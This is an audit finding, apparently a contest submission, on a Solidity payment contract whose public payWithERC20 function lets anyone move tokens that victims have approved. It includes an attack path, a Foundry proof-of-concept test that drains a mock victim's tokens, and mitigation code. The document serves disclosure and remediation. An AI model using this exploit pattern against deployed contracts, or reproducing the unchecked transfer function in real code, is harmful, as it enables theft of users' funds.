Wonderful Lava Fox

High

# Attackers will steal tokens from users by exploiting unprotected ERC20 transfer function

### Summary

The lack of access control in `payWithERC20` function will cause a complete loss of approved tokens for users as attackers will directly call the function to transfer tokens from any address to their own address

### Root Cause

In [src/Payment.sol#L25-L33](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25-L33) there is a missing access control check on the `payWithERC20` function, allowing any caller to specify arbitrary `fromAddress` and `toAddress` parameters:

```solidity
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
    // check from and to address
    require(fromAddress != toAddress, "Cannot transfer to self address");
    require(toAddress != address(0), "Invalid to address");
    require(amount > 0, "Amount must be greater than 0");
    IERC20 token = IERC20(erc20TokenAddress);
    token.safeTransferFrom(fromAddress, toAddress, amount);
}
```

The function is public and doesn't enforce that the caller is the `fromAddress` or an authorized operator, despite the comment suggesting it should normally use `msg.sender`.


### Internal Pre-conditions

1. A user needs to approve the `BlueprintCore` or `Payment` contract to spend their ERC20 tokens
2. The `payWithERC20` function must remain public and without access control checks
3. The user must have a non-zero amount of the approved ERC20 tokens in their wallet

### External Pre-conditions

No external pre-conditions are required for this vulnerability

### Attack Path

1. **Victim approves the `BlueprintCore` or `Payment` contract to spend their ERC20 tokens** (this happens during normal platform interaction)
2. **Attacker monitors the blockchain for approval transactions to the contract**
3. **Attacker calls `payWithERC20` function directly**, specifying:
   - `erc20TokenAddress`: The address of the token that was approved
   - `amount`: An amount up to the approved amount
   - `fromAddress`: The victim's address
   - `toAddress`: The attacker's wallet address
4. **The function transfers tokens from victim to attacker** without requiring any signatures or permissions from the victim
5. **Attacker can repeat the process** to drain all approved tokens or target multiple victims

### Impact

The users of the platform suffer a complete loss of any tokens they have approved to the contract. The attacker gains all these tokens with minimal effort. This vulnerability affects all users who approve tokens to the contract, which is a common requirement for normal platform functionality such as creating agents with tokens or topping up user balances.

### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {Vm} from "forge-std/Vm.sol";
import {BlueprintV5} from "../src/BlueprintV5.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";
import {Payment} from "../src/Payment.sol";
import {MockERC20} from "./MockERC20.sol";

contract POCArbitraryERC20TransferTest is Test {
    BlueprintV5 public blueprint;
    MockERC20 public mockToken;
    Payment public payment;

    address public victim = address(0x111);
    address public attacker = address(0x222);
    address public attackerWallet = address(0x333);

    function setUp() public {
        // Deploy contracts
        blueprint = new BlueprintV5();
        blueprint.initialize(); // initialize the contract
        
        mockToken = new MockERC20();
        payment = new Payment();
        
        // Setup victim with tokens
        mockToken.mint(victim, 1000 ether);
        
        // Victim approves both contracts to spend tokens
        // This would typically happen when the victim interacts with the platform
        vm.startPrank(victim);
        mockToken.approve(address(blueprint), 100 ether);
        mockToken.approve(address(payment), 100 ether);
        vm.stopPrank();
        
        // Verify initial balances
        assertEq(mockToken.balanceOf(victim), 1000 ether);
        assertEq(mockToken.balanceOf(attackerWallet), 0);
    }

    function test_ArbitraryERC20Transfer() public {
        // STEP 1: Verify the victim has approved tokens to both contracts
        assertEq(mockToken.allowance(victim, address(blueprint)), 100 ether);
        assertEq(mockToken.allowance(victim, address(payment)), 100 ether);
        
        // STEP 2: Attacker directly calls the payWithERC20 function in the Payment contract
        // Note: The attacker doesn't need any special permissions to do this
        vm.prank(attacker);
        
        // The attacker can transfer tokens from the victim to any address they want
        // as long as the victim has approved the payment contract
        payment.payWithERC20(
            address(mockToken),  // Token address
            50 ether,           // Amount to steal
            victim,             // From address (the victim)
            attackerWallet      // To address (attacker's wallet)
        );
        
        // STEP 3: Verify the tokens have been transferred
        assertEq(mockToken.balanceOf(victim), 950 ether);
        assertEq(mockToken.balanceOf(attackerWallet), 50 ether);
        
        // STEP 4: Attacker can drain all approved tokens
        vm.prank(attacker);
        payment.payWithERC20(
            address(mockToken),
            50 ether,
            victim,
            attackerWallet
        );
        
        // Verify the remaining approved tokens have been transferred
        assertEq(mockToken.balanceOf(victim), 900 ether);
        assertEq(mockToken.balanceOf(attackerWallet), 100 ether);
        
        // STEP 5: Demonstrate that this also works through the BlueprintCore contract
        // since it inherits from Payment
        vm.prank(attacker);
        blueprint.payWithERC20(
            address(mockToken),
            50 ether, // This will work because the victim approved tokens to the blueprint contract
            victim,
            attackerWallet
        );
        
        // Verify the additional tokens have been transferred
        assertEq(mockToken.balanceOf(victim), 850 ether);
        assertEq(mockToken.balanceOf(attackerWallet), 150 ether);
        
        // Drain the remaining tokens approved to the blueprint contract
        vm.prank(attacker);
        blueprint.payWithERC20(
            address(mockToken),
            50 ether,
            victim,
            attackerWallet
        );
        
        // Verify all approved tokens have been drained
        assertEq(mockToken.balanceOf(victim), 800 ether);
        assertEq(mockToken.balanceOf(attackerWallet), 200 ether);
    }
}
```

### Mitigation

Add proper access control to the `payWithERC20` function. There are several approaches to fix this issue:

1. Make the function `internal` instead of `public` to prevent direct external calls:

```solidity
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) internal {
    // Existing code...
}
```

2. If the function needs to remain public (e.g., for gasless transactions), add a check to ensure that either:
   - The caller is the `fromAddress` (standard case)
   - The caller is an authorized operator (for gasless transactions)

```solidity
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
    // Ensure caller is either the fromAddress or an authorized operator
    require(msg.sender == fromAddress || isAuthorizedOperator(msg.sender), "Unauthorized");
    
    // Existing code...
}
```

3. Implement a proper role-based access control system using OpenZeppelin's AccessControl:

```solidity
import "@openzeppelin/contracts/access/AccessControl.sol";

contract Payment is AccessControl {
    bytes32 public constant PAYMENT_PROCESSOR_ROLE = keccak256("PAYMENT_PROCESSOR_ROLE");
    
    function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
        // Ensure caller is either the fromAddress or has the PAYMENT_PROCESSOR_ROLE
        require(msg.sender == fromAddress || hasRole(PAYMENT_PROCESSOR_ROLE, msg.sender), "Unauthorized");
        
        // Existing code...
    }
}
```

4. If gasless transactions are needed, implement a proper meta-transaction pattern with signature verification:

```solidity
function executeMetaTransaction(
    address erc20TokenAddress,
    uint256 amount,
    address fromAddress,
    address toAddress,
    bytes memory signature
) public {
    // Verify the signature was signed by fromAddress
    bytes32 hash = keccak256(abi.encodePacked(erc20TokenAddress, amount, fromAddress, toAddress, nonce[fromAddress]));
    require(recoverSigner(hash, signature) == fromAddress, "Invalid signature");
    
    // Increment nonce to prevent replay attacks
    nonce[fromAddress]++;
    
    // Execute the transfer
    IERC20 token = IERC20(erc20TokenAddress);
    token.safeTransferFrom(fromAddress, toAddress, amount);
}
``` 